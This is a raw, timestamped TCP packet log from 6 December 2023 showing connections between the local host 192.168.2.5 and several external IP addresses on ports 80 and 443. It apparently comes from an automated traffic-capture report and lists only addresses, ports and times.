                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:19.780508995 CET44349724172.67.213.153192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:19.780536890 CET44349724172.67.213.153192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:19.782916069 CET44349723172.67.213.153192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:19.783128977 CET49723443192.168.2.5172.67.213.153
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:19.783138990 CET44349722172.253.115.84192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:19.783152103 CET44349723172.67.213.153192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:19.783323050 CET49722443192.168.2.5172.253.115.84
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:19.783354044 CET44349722172.253.115.84192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:19.784620047 CET44349723172.67.213.153192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:19.784684896 CET49723443192.168.2.5172.67.213.153
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:19.784799099 CET44349722172.253.115.84192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:19.784862995 CET49722443192.168.2.5172.253.115.84
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:19.785639048 CET49723443192.168.2.5172.67.213.153
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:19.785717964 CET44349723172.67.213.153192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:19.787743092 CET49722443192.168.2.5172.253.115.84
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:19.787976027 CET49722443192.168.2.5172.253.115.84
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:19.787985086 CET44349722172.253.115.84192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:19.788013935 CET44349722172.253.115.84192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:19.822715044 CET4972780192.168.2.5104.21.90.147
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:19.834028959 CET49722443192.168.2.5172.253.115.84
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:19.834048033 CET49723443192.168.2.5172.67.213.153
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:19.834058046 CET44349722172.253.115.84192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:19.834063053 CET49724443192.168.2.5172.67.213.153
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:19.834073067 CET44349723172.67.213.153192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:19.834088087 CET44349724172.67.213.153192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:19.834250927 CET44349721142.251.111.100192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:19.835386038 CET49721443192.168.2.5142.251.111.100
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:19.835397959 CET44349721142.251.111.100192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:19.836040974 CET44349721142.251.111.100192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:19.836127996 CET49721443192.168.2.5142.251.111.100
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:19.837095976 CET44349721142.251.111.100192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:19.837162971 CET49721443192.168.2.5142.251.111.100
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:19.839951038 CET49721443192.168.2.5142.251.111.100
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:19.840197086 CET49721443192.168.2.5142.251.111.100
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:19.840203047 CET44349721142.251.111.100192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:19.840228081 CET44349721142.251.111.100192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:19.882087946 CET49722443192.168.2.5172.253.115.84
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:19.882100105 CET49723443192.168.2.5172.67.213.153
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:19.882184029 CET49724443192.168.2.5172.67.213.153
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:19.884681940 CET49721443192.168.2.5142.251.111.100
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:19.884699106 CET44349721142.251.111.100192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:19.917150021 CET8049727104.21.90.147192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:19.917306900 CET4972780192.168.2.5104.21.90.147
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:19.917646885 CET4972780192.168.2.5104.21.90.147
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:19.930111885 CET49721443192.168.2.5142.251.111.100
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:20.011934996 CET8049727104.21.90.147192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:20.060614109 CET44349722172.253.115.84192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:20.062113047 CET44349722172.253.115.84192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:20.062167883 CET49722443192.168.2.5172.253.115.84
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:20.063476086 CET49722443192.168.2.5172.253.115.84
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:20.063486099 CET44349722172.253.115.84192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:20.100925922 CET44349721142.251.111.100192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:20.101279974 CET44349721142.251.111.100192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:20.101351976 CET49721443192.168.2.5142.251.111.100
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:20.101758957 CET49721443192.168.2.5142.251.111.100
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:20.101777077 CET44349721142.251.111.100192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:20.640255928 CET44349724172.67.213.153192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:20.640362978 CET44349724172.67.213.153192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:20.640446901 CET49724443192.168.2.5172.67.213.153
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:20.642514944 CET49724443192.168.2.5172.67.213.153
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:20.642532110 CET44349724172.67.213.153192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:20.771269083 CET8049727104.21.90.147192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:20.771294117 CET8049727104.21.90.147192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:20.771377087 CET4972780192.168.2.5104.21.90.147
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:20.779341936 CET4972980192.168.2.5172.67.198.151
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:20.874042988 CET8049729172.67.198.151192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:20.874238014 CET4972980192.168.2.5172.67.198.151
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:20.874691963 CET4972980192.168.2.5172.67.198.151
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:20.969091892 CET8049729172.67.198.151192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.014807940 CET8049729172.67.198.151192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.058023930 CET4972980192.168.2.5172.67.198.151
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.124104977 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.308533907 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.308660030 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.309020042 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.496537924 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.496566057 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.496650934 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.497165918 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.681030035 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.681092024 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.681126118 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.681145906 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.681145906 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.681193113 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.681229115 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.681272030 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.681303978 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.681341887 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.681348085 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.681385994 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.681437969 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.681476116 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.681509018 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.681551933 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.681586981 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.681626081 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.681660891 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.681699038 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.864860058 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.864911079 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.864928007 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.864950895 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.864967108 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.865014076 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.865077019 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.865115881 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.865119934 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.865173101 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.865191936 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.865238905 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.865247011 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.865299940 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.865303993 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.865350962 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.865360975 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.865413904 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.865417004 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.865468025 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.865473032 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.865509987 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.865515947 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.865560055 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.865582943 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.865622044 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.865633011 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.865664959 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.865715027 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.865767002 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.865776062 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.865864992 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.865879059 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.865910053 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.865920067 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.865978956 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.866019011 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.866061926 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.866066933 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.866112947 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.049365997 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.049473047 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.049489021 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.049644947 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.049767971 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.049767971 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.049774885 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.049851894 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.049943924 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.049972057 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.049972057 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.049993992 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.050019026 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.050065994 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.050076008 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.050117970 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.050586939 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.050623894 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.050643921 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.050667048 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.050683022 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.050753117 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.050781965 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.050798893 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.050802946 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.050853968 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.050853968 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.050901890 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.051193953 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.051250935 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.051301003 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.051347971 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.051373005 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.051425934 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.051429033 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.051482916 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.051796913 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.051856041 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.051856041 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.051901102 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.051908016 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.051944971 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.051950932 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.051984072 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.051989079 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.052068949 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.052078009 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.052107096 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.052114010 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.052145958 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.052154064 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.052187920 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.052623034 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.052660942 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.052671909 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.052701950 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.052716970 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.052742004 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.052762985 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.052802086 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.052993059 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.053041935 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.053042889 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.053091049 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.053097010 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.053141117 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.053150892 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.053189039 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.053194046 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.053227901 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.053232908 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.053265095 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.053271055 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.053303003 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.053312063 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.053339958 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.053348064 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.053376913 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.053404093 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.053423882 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.237761974 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.237868071 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.237886906 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.237983942 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.237984896 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.238023043 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.238034964 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.238061905 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.238071918 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.238101006 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.238111973 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.238141060 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.238148928 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.238181114 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.238226891 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.238255024 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.238260031 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.238296986 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.238316059 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.238349915 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.238460064 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.238514900 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.238528967 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.238565922 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.238575935 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.238615036 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.238634109 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.238672972 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.238689899 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.238723040 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.238740921 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.238780975 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.238787889 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.238826036 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.238850117 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.238899946 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.238948107 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.238995075 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.239017010 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.239053965 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.239065886 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.239097118 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.239124060 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.239161015 CET8049730159.223.29.40192.168.2.5
